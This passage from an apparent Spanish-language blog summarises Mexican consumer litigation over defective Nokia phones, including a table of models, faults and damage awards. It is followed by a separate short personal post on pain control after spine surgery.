Inconforme con la determinación anterior la parte demandada promovió juicio de amparo directo que fue resuelto el quince de diciembre de dos mil once en el sentido de negar la protección solicitada.

Contra esa resolución la parte demandada interpuso recurso de revisión que por acuerdo de veintiséis de enero de dos mil doce fue desechado por improcedente.

El dos de octubre de dos mil doce la Juez de la causa admitió a tramite el primer incidente de reclamación de daños e indemnización promovido por la actora en representación de veinticuatro consumidores, mismo que fue resuelto por sentencia interlocutoria de diecinueve de junio de dos mil trece en la que se determinó lo siguiente:

  • Respecto de los elementos de procedencia del incidente la parte actora debía probar: que los consumidores solicitaron se hiciera efectiva la garantía, la omisión de la demandada de hacerla efectiva (aunque en este aspecto, revirtió la carga de la prueba a la parte demandada); el daño ocasionado con motivo de dicha omisión y de ser necesario el lucro cesante o perjuicio provocado.
  • En relación al primer elemento determinó que los procedimientos administrativos de queja acreditaban, por sí mismos, que los consumidores exigieron a la parte demandada hacer efectiva la garantía.
  • Respecto del segundo elemento, como ya se dijo, determinó que le correspondía a la parte demandada acreditar, que contrario a lo sostenido por la actora, sí hizo válida la garantía de los equipos ya sea corrigiendo los defectos que presentaban, sustituyéndolos o determinando la imposibilidad material o legal de hacerlo.
  • En este sentido, la parte demandada sostuvo que respecto de algunos consumidores no era responsable, ya que los correspondientes procedimientos de queja concluyeron por desistimiento o en éstos se determinó la pérdida de la garantía del equipo.
  • Sobre el desistimiento, consideró que éste no surgió de la voluntad del consumidor sino como consecuencia de una sanción procesal impuesta por la parte actora, de acuerdo de dispuesto en el artículo 112 de la Ley Federal de Protección al Consumidor, que establece que si el reclamante injustificadamente no acude a la audiencia de conciliación, se le tendrá por desistido de la reclamación; por tanto, ello no demostraba el cumplimiento de la garantía.
  • Respecto de la supuesta pérdida de la garantía, estableció que si bien había casos en los que obraba constancia de que los teléfonos celulares estaban fuera de garantía en virtud de que fueron modificados sin autorización, ello era insuficiente ya que se requería que la parte demandada ofreciera una prueba pericial para que la Juzgadora contara con una opinión técnica veraz e imparcial que le permitiera determinar si había sido el caso.
  • Respecto del monto del daño sufrido por los consumidores determinó que:
    • Contrario a lo sostenido por la parte demandada, no puede ser igual al valor del componente del equipo que falló (por ejemplo la pantalla), ya que la presencia del defecto se tradujo en la imposibilidad de usar el teléfono para establecer comunicación.
    • A pesar de que el tribunal de alzada determinó que la reparación del daño no consistiría, en todos los casos, en el pago del precio que cada consumidor pago por el equipo, la Juez de la causa interpretó esta determinación en el sentido de que no implicaba una restricción sino más bien la posibilidad de que los consumidores también reclamaran el perjuicio, es decir, no estaban limitados a reclamar el precio del teléfono, sino también, lo que dejaron de percibir con motivo de la imposibilidad de usarlo, como la no conclusión de una operación comercial, la imposibilidad de obtener la confirmación de un trabajo, la adquisición de un nuevo teléfono celular, etcétera.
    • Determinó que el daño sufrido por los consumidores equivale únicamente al importe que éstos realmente pagaron por el teléfono, tomando en consideración el descuento que algunos vendedores les concedieron a los compradores y el monto que éstos pagaron por adquirir ciertos accesorios.
  • No hizo pronunciamiento alguno en torno a la afectación por perjuicio ya que la parte actora no solicitó pago alguno por este concepto.
  • Condenó a la parte demandada a pagar a 16 consumidores, por concepto de daños, el precio que pagaron por el equipo, más el veinte por ciento del daño ocasionado como indemnización.
  • Absolvió a la parte demandada del pago exigido a los ocho consumidores restantes ya que consideró que no demostraron la cantidad que pagaron por el teléfono.

Inconforme con la resolución anterior, la parte actora interpuso recurso de apelación mismo que fue resuelto el once de octubre de dos mil trece en el sentido de modificar la resolución apelada para condenar a la parte demandada a pagar a uno de los ocho consumidores respecto de los cuáles había sido absuelta en virtud de que sí quedo demostrado el importe que pagó por el teléfono.

En la siguiente tabla se muestran los modelos de los equipos que fueron adquiridos por los diecisiete consumidores a los que la parte demandada fue condenada a pagar, así como las fallas que presentaron y los correspondientes montos de daños e indemnización:

Fecha en la que el consumidor inició el procedimiento para hacer efectiva la garantía del equipo

Modelo del equipo

Descripción del defecto del equipo según lo describió el consumidor o según fue diagnosticado

Monto por concepto de daños

Monto por concepto de indemnización

Sub-total

26 Septiembre 2009

Nokia 1600

El equipo se calentaba mucho y la batería no cargaba

$57.51

$11.50

$69.01

2 Febrero 2009

Nokia 2630

El equipo no leía la tarjeta SIM

$1,354.00

$270.80

$1,624.80

No viene señalada

Nokia 5200

El equipo no leía la tarjeta SIM

$1,500.00

$300.00

$1,800.00

10 Marzo 2009

Nokia 5220

El equipo se trataba al estar en corriendo alguna aplicación

$1,899.00

$379.80

$2,278.80

20 Agosto 2008

Nokia 5300

El equipo se apagaba, bloqueaba y le fallaba la memoria externa

$2,484.00

$496.80

$2,980.80

23 Junio 2008

Nokia 5300

El equipo no encendía

$4,068.00

$813.60

$4,881.60

2 Mayo 2008

Nokia 5310

El equipo tenía baja recepción y la batería le duraba poco tiempo

$182.77

$36.55

$219.32

23 Diciembre 2008

Nokia 5310

El equipo no cargaba y por lo tanto tampoco encendía

$4,385.33

$877.07

$5,262.40

29 Agosto 2008

Nokia 5310b

El equipo se apagaba o se trababa y no daba acceso a la cámara

$2,499.00

$499.80

$2,998.80

26 Agosto 2008

Nokia 5610

El equipo al encenderse no terminaba el ciclo de encendido por lo que se apagaba

$3,749.00

$749.80

$4,498.80

6 Marzo 2008

Nokia 6131

El equipo tenía despegado el marco de la pantalla

$1,999.00

$399.80

$2,398.80

15 Enero 2008

Nokia N73

El equipo se pasmaba al tomar fotos, además de que el radio se escuchaba con interferencia y no se podía conectar a la Internet

$4,299.00

$859.80

$5,158.80

10 Julio 2008

Nokia N79

El equipo no prendía y se apagaba

$5,909.00

$1,181.80

$7,090.80

23 Junio 2008

Nokia N95

Al equipo le faltaba la pieza del conector de MMC, tenía el teclado dictaminado (sic) y la pantalla rayada

$5,134.29

$1,026.86

$6,161.15

No viene señalado

$1,979.00

$395.80

$2,374.80

No viene señalado

$2,299.00

$459.80

$2,758.80

No viene señalado

$1,499.00

$299.80

$1,798.80

Total

$54,356.28

Por acuerdo de uno de abril dos mi catorce la Juez de la causa determinó que quedó cumplida la sentencia interlocutoria.

El dieciséis de enero de dos mil quince y once de agosto siguiente el Juez de la causa admitió a tramite el segundo y tercer incidente de reclamación y cuantificación de daños y perjuicios respectivamente, mismos que fueron promovidos por la parte actora en representación de un número desconocido de consumidores.

Fuentes:

  1. Boletín de prensa número #57 de 28 de septiembre de 2014 de la Procuraduría Federal del Consumidor.
  2. Sentencia dictada el quince de abril de dos mil once por el Juzgado Décimo Primero de Distrito en Materia Civil en el Distrito Federal en el juicio ordinario civil 110/2010.
  3. Sentencia dictada el catorce de junio de dos mil once por el Primer Tribunal Unitario en Materias Civil y Administrativa del Primer Circuito en el toca civil 191/2011.
  4. Sentencia dictada el quince de diciembre de dos mil once por el Décimo Cuarto Tribunal Colegiado en Materia Civil del Primer Circuito en el juicio de amparo directo 505/2011.
  5. Acuerdo dictado el veintiséis de enero de dos mil doce por el Pleno de la Suprema Corte de Justicia de la Nación en el amparo directo en revisión 201/2012.
  6. Sentencia interlocutoria dictada el diecinueve de junio de dos mil trece por el Juzgado Décimo Primero de Distrito en Materia Civil en el Distrito Federal en el primer incidente de reclamación de daños e indemnización del juicio ordinario civil 110/2010.
  7. Sentencia dictada el once de octubre de dos mil trece por el Primer Tribunal Unitario en Materias Civil y Administrativa del Primer Circuito en el toca civil 291/2013.

Sábado 07 de noviembre de 2015

Héctor Daniel Cortés

Héctor Daniel Cortés
'Aztec Eagle' Turbo

Cuidados después de una operación de la columna

II. Control del Dolor

Uno de los aspectos importantes es el control del dolor. Mientras uno está en el hospital los medicamentos para el dolor se suministran por la vía intravenosa, en dosis y horarios controlados por el personal.

Al salir, pasan a ser administrados por vía oral. La dosis y el horario también deben ser observados, ya sea por uno mismo o por quien cuida al paciente.

Existen varios orígenes para el dolor:

- La herida de la operación
- Los implantes internos
- La manipulación de la columna
- La nueva mecánica de la columna
- Dolores fantasmas

Para cada tipo de dolor existe un tipo de medicamento. Algunos pueden ser Medicamentos Controlados, por lo que puede llegar a ser complicado resurtir las recetas en el tiempo adecuado. Por lo general no es así.

Es muy desagradable irse a dormir o despertar con dolor debido a que "se pasa" la hora de la dosis.

Eventualmente el dolor debe disminuir considerablemente. Y como paciente no hay que cometer el error de decir "no duele" cuando en realidad nos duele poco comparado con los episodios de dolor intenso cuando evidentemente "nos duele".

Por el momento, el dolor parece estar controlado. Hasta la siguiente dosis.